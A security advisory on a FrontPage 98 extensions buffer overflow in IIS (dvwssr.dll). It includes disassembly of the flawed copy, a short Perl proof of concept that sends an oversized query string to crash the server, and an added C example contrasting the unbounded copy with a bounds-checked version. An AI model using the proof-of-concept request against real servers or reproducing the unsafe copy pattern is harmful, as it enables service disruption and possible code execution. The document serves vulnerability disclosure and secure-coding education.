MS IIS FrontPage 98 Extensions Buffer Overflow Vulnerability

Advisory ID (Internal): CORE-041200

1. Advisory Information

Date Published: 2000-04-14
Last Update: 2000-04-14
Advisory ID: CORE-041200
Bugtraq ID: 1109
CVE Name: CVE-2000-0260
Title: MS IIS FrontPage 98 Extensions Buffer Overflow Vulnerability
Class: Boundary Error Condition (Buffer Overflow)
Remotely Exploitable: Yes
Locally Exploitable: No
Release Mode: USER RELEASE

2. Vulnerability Description:

The dvwssr.dll included with the FrontPage 98 extensions for IIS and shipped as part of the NT Option Pack has a remotely exploitable buffer overflow. This attack will result in the service no longer accepting connections and may allow for remote code execution on the vulnerable host.

3. Vulnerable Packages:

  • Microsoft FrontPage 98 Server Extensions for IIS
  • Microsoft FrontPage 98
  • Microsoft IIS 4.0
  • Microsoft NT Option Pack for NT 4.0
  • Microsoft InterDev 1.0
  • Microsoft Windows NT 4.0

4. Solution/Vendor Information/Workaround:

Workaround: Delete DVWSSR.DLL (this may break InterDev).

5. Credits:

This vulnerability was found by Gerardo Richarte and Alberto Soliño from Core Security.

6. Technical Description - Exploit/Concept Code:

We have been playing with dvwssr.dll and we have found a buffer overflow that, at the very least, stops the server from accepting incoming connections.

The code where the buffer overflow resides is:

mov eax, [edi+TEXTENSION_CONTROL_BLOCK.lpszQueryString] ; attacker-controlled query string from the ISAPI control block
test eax, eax
jz _text_581813FD                                       ; no query string: skip the copy
push eax                                                ; source: the query string (any length)
lea eax, [esp+14h+queryStringCoph]                      ; destination: fixed-size buffer on the stack
push eax
call ds:lstrcpyA ;see here MS ENGINEERS: BUFFER OVERFLOW ; no length check before the copy
test eax, eax
jz _text_581813FD
lea eax, [esp+10h+queryStringCoph]
push eax
call unescape_url                                       ; the copied string is then URL-decoded in place

Of course, having the source code makes it harder to find these types of bugs...

So, below is an example of how to exploit this vulnerability:

#!/usr/bin/perl
# Prints a single GET request whose query string is 5000 bytes long.
# HTTP lines end in CRLF and an empty line terminates the headers.
print "GET /_vti_bin/_vti_aut/dvwssr.dll?" . ("a" x 5000) . " HTTP/1.1\r\n";
print "Host: yourhost\r\n";
print "\r\n";

We've been playing a little more trying to exploit this buffer overflow, and as we don't have InterDev installed on our IIS, we copied the .dll to the /msadc directory; with this configuration we have been able to make the code jump to our buffer.

Under these circumstances, the buffer overflow allows arbitrary code to be executed on the target machine. It's interesting to note that no log entry is generated as an effect of this attack.
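The following is an added example and is not code from the advisory, from Core Security or from Microsoft. It models in C the copy-then-unescape sequence shown in the disassembly above (lstrcpyA of lpszQueryString into a fixed stack buffer, then unescape_url) beside a bounds-checked replacement, and measures the query string of a request line shaped like the Perl proof of concept so that an oversized request is refused before any byte is copied. QUERY_BUF_SIZE and every function name here are assumptions; the real buffer size inside dvwssr.dll is not stated in the advisory.

```c
/* Added example (not from the advisory): the unbounded copy pattern from the
 * disassembly, a bounds-checked replacement, and a request-line query check.
 * QUERY_BUF_SIZE and all function names are assumptions. */
#include <ctype.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define QUERY_BUF_SIZE 256   /* assumed size of the fixed stack buffer */

static int hexval(int c)
{
    if (c >= '0' && c <= '9') return c - '0';
    c = tolower(c);
    return (c >= 'a' && c <= 'f') ? c - 'a' + 10 : -1;
}

/* Decode %XX escapes and '+' in place (the unescape_url step). The output is
 * never longer than the input, so it fits in the same buffer; malformed
 * escapes are passed through unchanged. */
void url_unescape_inplace(char *s)
{
    char *r = s, *w = s;
    while (*r) {
        if (*r == '%' && hexval(r[1]) >= 0 && hexval(r[2]) >= 0) {
            *w++ = (char)(hexval(r[1]) * 16 + hexval(r[2]));
            r += 3;
        } else if (*r == '+') {
            *w++ = ' ';
            r++;
        } else {
            *w++ = *r++;
        }
    }
    *w = '\0';
}

/* The vulnerable pattern: copy into a fixed stack buffer with no length
 * check, then unescape. A query of QUERY_BUF_SIZE bytes or more runs past
 * buf and over the saved return address. Shown for comparison only. */
int handle_query_unsafe(const char *query)
{
    char buf[QUERY_BUF_SIZE];
    strcpy(buf, query);              /* unbounded copy: the overflow */
    url_unescape_inplace(buf);
    return (int)strlen(buf);
}

/* Hardened replacement: the length is checked before anything is copied and
 * the destination size is explicit. Returns the decoded length, or -1 when
 * the query would not fit (the request should then be rejected). */
int handle_query_safe(const char *query, size_t qlen, char *out, size_t outsz)
{
    if (qlen >= outsz)
        return -1;
    memcpy(out, query, qlen);
    out[qlen] = '\0';
    url_unescape_inplace(out);
    return (int)strlen(out);
}

/* Locate the query in a request line ("GET /path?query HTTP/1.1"): returns a
 * pointer just after '?' and stores its length, or NULL if there is none. */
const char *request_query(const char *line, size_t *qlen)
{
    const char *q = strchr(line, '?');
    if (!q)
        return NULL;
    q++;
    const char *end = strchr(q, ' ');
    *qlen = end ? (size_t)(end - q) : strlen(q);
    return q;
}

/* Constructed request line in the shape of the advisory's PoC: n bytes of
 * 'a' as the query string. The caller frees the result. */
char *build_long_request(size_t n)
{
    const char *pre = "GET /_vti_bin/_vti_aut/dvwssr.dll?", *post = " HTTP/1.1";
    char *line = malloc(strlen(pre) + n + strlen(post) + 1);
    if (!line)
        return NULL;
    strcpy(line, pre);
    memset(line + strlen(pre), 'a', n);
    strcpy(line + strlen(pre) + n, post);
    return line;
}

int main(void)
{
    char out[QUERY_BUF_SIZE];
    size_t qlen;
    char *line = build_long_request(5000);    /* the PoC-sized request */
    const char *q = request_query(line, &qlen);
    /* -1: refused before a byte is copied; the unsafe variant would overflow */
    printf("%zu-byte query -> %d\n", qlen, handle_query_safe(q, qlen, out, sizeof out));
    free(line);
    return 0;
}
```

The point of the comparison is that the check must happen on the length of the untrusted input before the copy, with the destination size passed explicitly; decoding in place is only safe because percent-decoding never lengthens a string.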

7. About Core Security 

Core Security develops strategic security solutions for Fortune 1000 corporations, government agencies and military organizations. The company offers information security software and services designed to assess risk and protect and manage information assets. 

To learn more about Core Impact, the first comprehensive penetration testing framework, visit our website.

8. Disclaimer

The contents of this advisory are copyright (c) 2003 CORE Security Technologies and may be distributed freely provided that no fee is charged for this distribution and proper credit is given.